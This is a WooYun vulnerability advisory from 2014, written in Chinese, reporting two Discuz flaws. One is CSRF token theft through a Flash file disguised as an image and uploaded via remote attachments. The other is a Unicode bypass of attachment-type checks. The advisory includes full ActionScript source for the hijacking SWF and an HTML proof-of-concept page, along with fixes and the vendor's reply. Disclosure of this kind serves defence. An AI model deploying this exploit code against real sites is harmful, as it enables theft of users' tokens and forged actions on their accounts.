当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065249

漏洞标题:Discuz跨域数据劫持+附件类型限制绕过

相关厂商:Discuz!

漏洞作者: mramydnei

提交时间:2014-06-17 14:28

修复时间:2014-09-15 14:30

公开时间:2014-09-15 14:30

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-17: 细节已通知厂商并且等待厂商处理中
2014-06-17: 厂商已经确认,细节仅向厂商公开
2014-06-20: 细节向第三方安全合作伙伴开放
2014-08-11: 细节向核心白帽子及相关领域专家公开
2014-08-21: 细节向普通白帽子公开
2014-08-31: 细节向实习白帽子公开
2014-09-15: 细节向公众公开

简要描述:

两个凑一块发了

详细说明:

#1 跨域数据劫持(csrf token formhash盗取)
下载远程附件功能不会对文件内容(文件格式)进行检测导致可以上传恶意的swf文件(扩展名还是图片扩展名),进而进行跨域数据劫持:
伪造图片CrossDomainDataHijack.jpg相关代码:

package com.powerflasher.SampleApp {
            import flash.external.ExternalInterface;
            import flash.display.Sprite;
            import flash.display.Sprite;
        import flash.events.Event;
        import flash.net.URLLoader;
        import flash.net.URLRequest;
        import flash.text.TextField;
        import flash.text.TextFieldAutoSize;
        import flash.xml.*;
        import flash.events.IOErrorEvent;
            import flash.events.*;
        import flash.net.*;
            /**
             * @author User
             */
           
            public class CrossDomainDataHijack extends Sprite {
            
            private var loader:URLLoader;
            public function CrossDomainDataHijack() {
                loader = new URLLoader();
                configureListeners(loader);
                            var target:String = root.loaderInfo.parameters.input;
                           
                var request:URLRequest = new URLRequest(target);
                try {
                    loader.load(request);
                } catch (error:Error) {
                    sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace());
                }
            }
            private function configureListeners(dispatcher:IEventDispatcher):void {
                dispatcher.addEventListener(Event.COMPLETE, completeHandler);
                dispatcher.addEventListener(Event.OPEN, openHandler);
                dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
                dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
                dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
                dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
            }
            private function completeHandler(event:Event):void {
                var loader:URLLoader = URLLoader(event.target);
                //trace("completeHandler: " + loader.data);
                        sendDatatoJS("completeHandler: " + loader.data);
            }
            private function openHandler(event:Event):void {
                //trace("openHandler: " + event);
                            sendDatatoJS("openHandler: " + event);
            }
            private function progressHandler(event:ProgressEvent):void {
                //trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
                            sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
            }
            private function securityErrorHandler(event:SecurityErrorEvent):void {
                //trace("securityErrorHandler: " + event);
                            sendDatatoJS("securityErrorHandler: " + event);
            }
            private function httpStatusHandler(event:HTTPStatusEvent):void {
                //trace("httpStatusHandler: " + event);
                            sendDatatoJS("httpStatusHandler: " + event);
            }
            private function ioErrorHandler(event:IOErrorEvent):void {
                //trace("ioErrorHandler: " + event);
                            sendDatatoJS("ioErrorHandler: " + event);
            }
                   
                    private function sendDatatoJS(data:String):void{
                trace(data);
                            ExternalInterface.call("sendToJavaScript", data);
                    }
        }
           
           
    }


POC页面相关代码:

><head>
<title>steal CSRF tokens by upload a fake image(flash) file on target site</title>
</head><body><h1 align="center">steal CSRF tokens by upload a fake image(flash) file on targe site</h1>
<script>
function sendToJavaScript(strData){
        var theDiv = document.getElementById("HijackedData");
        var content = document.createTextNode(strData);
        theDiv.appendChild(content);
        theDiv.innerHTML += '<br/>'
        //alert(strData);
}
function refreshObjectTag(){
        var newURL = document.getElementById('flashFile').value +"?input="+document.getElementById('target').value;
       
        var newObjectTag = createSwfObject(newURL,{id: 'myObject', width: 100, height: 100, 'AllowScriptAccess': 'always'},{'AllowScriptAccess': 'always'})
        document.body.removeChild(document.getElementById("myObject"));
        document.body.appendChild(newObjectTag);
}
var createSwfObject = function(src, attributes, parameters) {
  var i, html, div, obj, attr = attributes || {}, param = parameters || {};
  attr.type = 'application/x-shockwave-flash';
  if (window.ActiveXObject) {
    attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
    param.movie = src;
  }
  else {
    attr.data = src;
  }
  html = '<object';
  for (i in attr) {
    html += ' ' + i + '="' + attr[i] + '"';
  }
  html += '>';
  for (i in param) {
    html += '<param name="' + i + '" value="' + param[i] + '" />';
  }
  html += '</object>';
  div = document.createElement('div');
  div.innerHTML = html;
  obj = div.firstChild;
  div.removeChild(obj);
  return obj;
};
</script>
File: <input id="flashFile" size="100" value="http://x55.me/CrossDomainDataHijack.jpg" type="text"> <br>
Page: <input id="target" size="100" value="http://x55.me/csrf.php" type="text"> <br>
<input value="start to steal some CSRF tokens" onclick="refreshObjectTag()" type="button"><br>
<br>
<div id="HijackedData"></div>
<br>
<object id="myObject"></object>
</body></html>


获取formhash截图:

123.png


#2
绕过附件类型限制用到的是上次有讲到的Hacking with Unicode上面的小trick。这个算BUG吧,算不上安全漏洞 起码暂时我还没能把它联系到漏洞上面。可以选择性修复:

123333.png


测试:

12444444.png


成功绕过:

125555555.png


漏洞证明:

证明如上

修复方案:

1.对于加载远程附件功能也加上检测文件格式的流程
2.第二个问题可以选择性修复

版权声明:转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-17 15:11

厂商回复:

感谢您提供的信息。我们会尽快确认并修复。问题2应当不会造成什么安全威胁,虽然绕过了文件名的检测,但是上传的文件在实际存储的时候,我们会使用随机文件名和固定的后缀。dz目前尚未严格要求文件后缀与文件内容必须一致,这个判断过于复杂且必要性不大。

最新状态:

暂无